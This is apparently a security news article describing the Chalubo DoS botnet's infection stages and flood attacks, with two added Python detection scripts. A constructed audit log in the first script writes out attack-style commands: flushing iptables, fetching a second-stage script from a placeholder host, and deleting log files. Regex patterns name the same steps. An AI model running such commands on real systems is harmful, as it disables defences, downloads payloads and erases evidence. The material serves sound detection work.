The Chalubo botnet is a recently discovered malware that borrows advanced features from other threats and is being used in DoS (denial-of-service) attack campaigns. At the moment several attacks have been sighted. Our article gives an overview of how the malware functions.
The Chalubo Botnet Is a Formidable DoS Weapon
A new dangerous malware called the Chalubo botnet has been discovered by a team of security researchers. Several iterations of it have been found to cause infections. The first versions linked to it were observed back in August, when three malicious components were used in an attack against x86 machines. This is believed to have been an early test attack, probably a way for the operators to fine-tune and tweak the botnet.
The Elknot dropper was later used to deliver a more complete version of the malware. The captured samples indicate that several variants are available — there are specialist versions for each architecture. This makes it very effective against both servers and IoT devices.
In September a shift in the infection tactics was observed. Instead of the dropper, the malicious component relied on brute force attacks against remote desktop services. The hackers loaded the infection script with default credentials and commonly used username and password combinations. Updated versions of the Chalubo botnet featured advanced anti-analysis code that protected them from being discovered by both administrators and security software. This is done by launching a hardcoded script that executes the following operations:
- Firewall bypass
- Installation of the “wget” download utility if it is not present
- Download of a second-stage script
- System modification
- Log file removal
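The five stages listed above are a useful detection sequence: each one on its own is noisy on a busy host, but several of them appearing together on the same machine in a short span is a much stronger signal. The following Python script is an added example written for this article, not code from the researchers or from the malware; it scans constructed command-audit lines in a simple `host|user|command` format (the format and the command patterns for each stage are assumptions chosen for illustration) and flags hosts on which at least three of the stages occur.

```python
import re
from collections import defaultdict

# Constructed sample audit lines in a "host|user|command" format (an assumed
# format for this example, not a real log format mentioned in the article).
# srv01 shows the staged deployment sequence; srv02 shows benign admin activity.
SAMPLE_AUDIT_LINES = [
    "srv01|admin|ls -la /var/www",
    "srv01|admin|iptables -F",
    "srv01|admin|iptables -P INPUT ACCEPT",
    "srv01|admin|apt-get install -y wget",
    "srv01|admin|wget http://example.invalid/stage2.sh -O /tmp/stage2.sh",
    "srv01|admin|chmod +x /tmp/stage2.sh",
    "srv01|admin|rm -rf /var/log/wtmp /var/log/secure",
    "srv02|deploy|wget https://example.invalid/release.tar.gz",
    "srv02|deploy|tar xzf release.tar.gz",
]

# One regular expression per stage named in the article. The patterns are
# assumptions for illustration; a production rule set would be much broader.
STAGE_PATTERNS = {
    "firewall_bypass": re.compile(
        r"\b(iptables\s+(-F|-P\s+\w+\s+ACCEPT)|ufw\s+disable|"
        r"systemctl\s+(stop|disable)\s+firewalld)\b"),
    "install_wget": re.compile(
        r"\b(apt(-get)?|yum|dnf|apk|opkg)\s+(install|add)\b.*\bwget\b"),
    "second_stage_download": re.compile(r"\b(wget|curl)\b.*\.(sh|py|bin)\b"),
    "system_modification": re.compile(
        r"(chmod\s+\+x\s+/tmp/|crontab\s+-|echo\s+.*>>\s*/etc/rc\.local)"),
    "log_removal": re.compile(r"\brm\b.*\s/var/log/"),
}


def classify_command(command: str):
    """Return the deployment stage a command matches, or None if it matches none."""
    for stage, pattern in STAGE_PATTERNS.items():
        if pattern.search(command):
            return stage
    return None


def parse_line(line: str):
    """Split one constructed audit line into (host, user, command)."""
    host, user, command = line.split("|", 2)
    return host, user, command


def score_hosts(lines):
    """Map each host to the sorted list of distinct deployment stages seen on it."""
    stages_by_host = defaultdict(set)
    for line in lines:
        host, _user, command = parse_line(line)
        stage = classify_command(command)
        if stage is not None:
            stages_by_host[host].add(stage)
    return {host: sorted(stages) for host, stages in stages_by_host.items()}


def flag_hosts(lines, min_stages=3):
    """Return hosts on which at least min_stages distinct stages were observed."""
    return sorted(host for host, stages in score_hosts(lines).items()
                  if len(stages) >= min_stages)


if __name__ == "__main__":
    for host, stages in score_hosts(SAMPLE_AUDIT_LINES).items():
        print(f"{host}: {', '.join(stages)}")
    print("flagged:", flag_hosts(SAMPLE_AUDIT_LINES))
```

Requiring several stages rather than any one keeps the rule from firing on an administrator who legitimately installs wget or rotates logs; the `min_stages` threshold is the knob to tune against a host's normal activity.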
What follows is the actual bot deployment. When started, it connects to a specific hacker-controlled server and reports the successful infection. The observed hacker instructions were to download other modules depending on the individual machine configuration. So far it seems that the Chalubo botnet is used to perform all basic DoS attacks — DNS, UDP and SYN floods against a given target. We anticipate that the attacks, and further upgrades to its code base, will continue. As the botnet is based on scripts and publicly available source code, there is the possibility that it will be sold or traded on underground hacker marketplaces. As such, derivative versions may include more dangerous modules.
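The three flood types named above (DNS, UDP and SYN) each have a simple traffic signature on the receiving side: a burst of SYN-only TCP segments, or of UDP datagrams (to port 53 for the DNS case), toward one destination. The script below is an added example for this article, not code from the researchers or from the botnet; it builds a constructed packet-summary list (all addresses and timestamps are made up) and reports any destination that receives more than an assumed threshold of flood-type packets in a one-second bucket.

```python
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    """Minimal packet summary; the field set is an assumption for this example."""
    ts: float          # arrival time in seconds
    src: str
    dst: str
    proto: str         # "tcp" or "udp"
    dport: int
    tcp_flags: str = ""  # e.g. "S" for a SYN-only segment, "SA" for SYN-ACK


def flood_kind(pkt: Packet):
    """Classify a packet as a candidate for one of the three flood types, or None."""
    if pkt.proto == "tcp" and pkt.tcp_flags == "S":
        return "syn_flood"
    if pkt.proto == "udp" and pkt.dport == 53:
        return "dns_flood"
    if pkt.proto == "udp":
        return "udp_flood"
    return None


def detect_floods(packets, threshold_per_second=50):
    """Return {(dst, kind): peak_count} for destinations whose peak one-second
    count of flood-type packets reaches the threshold (an assumed value)."""
    buckets = Counter()
    for pkt in packets:
        kind = flood_kind(pkt)
        if kind is None:
            continue
        buckets[(pkt.dst, kind, int(pkt.ts))] += 1
    peaks = {}
    for (dst, kind, _second), count in buckets.items():
        key = (dst, kind)
        if count > peaks.get(key, 0):
            peaks[key] = count
    return {key: count for key, count in peaks.items()
            if count >= threshold_per_second}


def build_sample_traffic():
    """Constructed traffic: a SYN flood, a DNS flood and some benign background."""
    pkts = []
    # 120 SYN-only segments to 10.0.0.5:80 from many sources inside one second
    for i in range(120):
        pkts.append(Packet(ts=1000.0 + i / 120, src=f"198.51.100.{i % 200}",
                           dst="10.0.0.5", proto="tcp", dport=80, tcp_flags="S"))
    # 90 UDP datagrams to 10.0.0.9:53 inside the same second
    for i in range(90):
        pkts.append(Packet(ts=1000.0 + i / 90, src=f"203.0.113.{i % 250}",
                           dst="10.0.0.9", proto="udp", dport=53))
    # Benign background: a handful of handshakes and DNS lookups
    for i in range(5):
        t = 1000.0 + i * 0.1
        pkts.append(Packet(ts=t, src="192.0.2.10", dst="10.0.0.7",
                           proto="tcp", dport=443, tcp_flags="S"))
        pkts.append(Packet(ts=t, src="192.0.2.10", dst="10.0.0.7",
                           proto="tcp", dport=443, tcp_flags="A"))
        pkts.append(Packet(ts=t, src="192.0.2.11", dst="10.0.0.9",
                           proto="udp", dport=53))
    return pkts


if __name__ == "__main__":
    for (dst, kind), peak in sorted(detect_floods(build_sample_traffic()).items()):
        print(f"{dst}: {kind} peak {peak} pkt/s")
```

Bucketing by whole seconds is deliberately crude; a sliding window and a per-destination baseline would cut false positives on busy services, and counting distinct sources per bucket is the usual next step for telling a flood from a single misbehaving client.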